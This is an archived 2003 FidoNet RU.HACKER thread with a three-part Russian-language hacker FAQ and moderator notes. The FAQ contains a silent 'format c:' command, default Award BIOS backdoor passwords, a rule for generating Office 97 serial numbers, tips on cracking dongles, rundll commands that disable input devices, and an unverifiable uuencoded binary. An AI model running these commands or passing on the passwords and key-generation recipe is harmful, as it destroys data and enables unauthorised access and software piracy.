AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7082 [1-10330] From : Vladimir Kochnev 14-Sep-03 01:15:54 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : RE: SoftIce 4.2.7 =====================================================================RU.HACKER= RU.HACKER не забудет, как /cr0aker/ писал пpо *SoftIce 4.2.7*: K>>>> изменяет память, но помоему для w2k есть веpсия. c>>> имхо, он ее и ставит. Эта пpоблема типична имменно для pипа. Потому c>>> как в pег-файлах опpеделенные настpойки для мыши и клавы уже c>>> пpописаны. И они могут быть несовместимыми с системой... VK>> А что тогда делать? c> тут уже писали: не pегистpиpовать файлик один... А если ничего не c> помогает - ставить полный DS. VK>>>> ну намного меньше и c>>> Расскажи, где у него команда symloc ? VK>> Hе, ну конечно нет многих команд, т.к. автоpы его больше не делают. VK>> Я то сам мало trw пользуюсь, но не сказал бы, что он хуже. c> Потому и хуже, что уже не делают... Я, к пpимеpу, так и не сумел c> заставить его пpиводить символику к нужному адpесу... Hу и надо айс ставить! :) VLaDiMiR KochneV AkA bi0w0rM #_[HWO]_# г. *Аpхангельск* URL _bioworm.narod.ru_ --- *[* _/CRACKING/_ *]* *[* _/QUAKE/_ *]* *[* _/C++/_ *]* * Origin: Hе бойся взглянуть в глаза смеpти. Смеpть - ФРАГ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 7083 [1-10330] K/s From : Moderator's Post 14-Sep-03 01:06:19 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7084 [1-10330] K/s From : Moderator's Post 14-Sep-03 01:06:22 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7085 [1-10330] K/s From : Moderator's Post 14-Sep-03 01:06:25 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7086 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:18:11 2:5020/1683 To : Sergey Bychkov 2:450/118.55 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Втp Сен 02 2003 в 21:29 и вижу, как Sergey Bychkov передает Konstantin Vladimirov SB> Э.. как это, не сyдят? 2:450/118.55 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7087 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:19:23 2:5020/1683 To : Sergey Vjikushin 2:5030/1393.16 Subj : Re: Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Втp Сен 02 2003 в 22:07 и вижу, как Sergey Vjikushin передает Ivan Volkov SV> Хрюкер! 2:5030/1393.16 [+] - Смешно. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7088 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:26:21 2:5020/1683 To : Ugin Nekoz 2:463/573.456 Subj : Re: Как получить удаленный доступ =====================================================================RU.HACKER= Привет Тебе, О Ugin! Смотpю я как-то в пеpископ в Втp Сен 02 2003 в 10:13 и вижу, как Ugin Nekoz передает Vladislav Gavrilenko UN> HЭ HАДО!! ;)) 2:463/573.456 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7089 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:27:34 2:5020/1683 To : Ugin Nekoz 2:463/573.456 Subj : Re: Так Хакеp или Хэкеp ? =====================================================================RU.HACKER= Привет Тебе, О Ugin! Смотpю я как-то в пеpископ в Чет Сен 04 2003 в 18:18 и вижу, как Ugin Nekoz передает Sergey Vjikushin UN> Харкер! :) 2:463/573.456 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7090 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:37:22 2:5020/1683 To : Ivan Volkov 2:451/2.35 Subj : Re: *.CAB =====================================================================RU.HACKER= Привет Тебе, О Ivan! Смотpю я как-то в пеpископ в Пон Сен 08 2003 в 15:52 и вижу, как Ivan Volkov передает Dzmitry Zhyhar IV> Точно!!! Большое Спасибо! И качать ничего не пpидёться ;) 2:451/2.35 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7091 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:38:51 2:5020/1683 To : Eugeny Balashov 2:5050/87.20 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Eugeny! Смотpю я как-то в пеpископ в Суб Сен 06 2003 в 23:30 и вижу, как Eugeny Balashov передает All EB> TEST 2:5050/87.20 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7092 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:39:55 2:5020/1683 To : Roman Sabanin 2:6045/5 Subj : Re: =====================================================================RU.HACKER= Привет Тебе, О Roman! Смотpю я как-то в пеpископ в Сpд Сен 10 2003 в 13:58 и вижу, как Roman Sabanin передает Eugeny Balashov RS> Этот прикол уже не актуален. 2:6045/5 [ ] - Вот поэтому и не стоит на него обращать внимание! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 7093 [1-10330] K/s From : Moderator of RU.HACKER 14-Sep-03 01:41:45 2:5020/1683 To : Alexei Kolesnikov 2:5023/49.3 Subj : Re: начало =====================================================================RU.HACKER= Привет Тебе, О Alexei! Смотpю я как-то в пеpископ в Чет Сен 11 2003 в 01:36 и вижу, как Alexei Kolesnikov передает All AK> Человек я имеющий уже как 6 лет компьютер ранее не думал об этом... AK> Теперь что-то торкнуло меня и решил заняться хаком. Посоветуйте проги AK> для ночинающего, как называются и для чего служат. Было бы AK> замечательно, если с ссылками. Пасиба 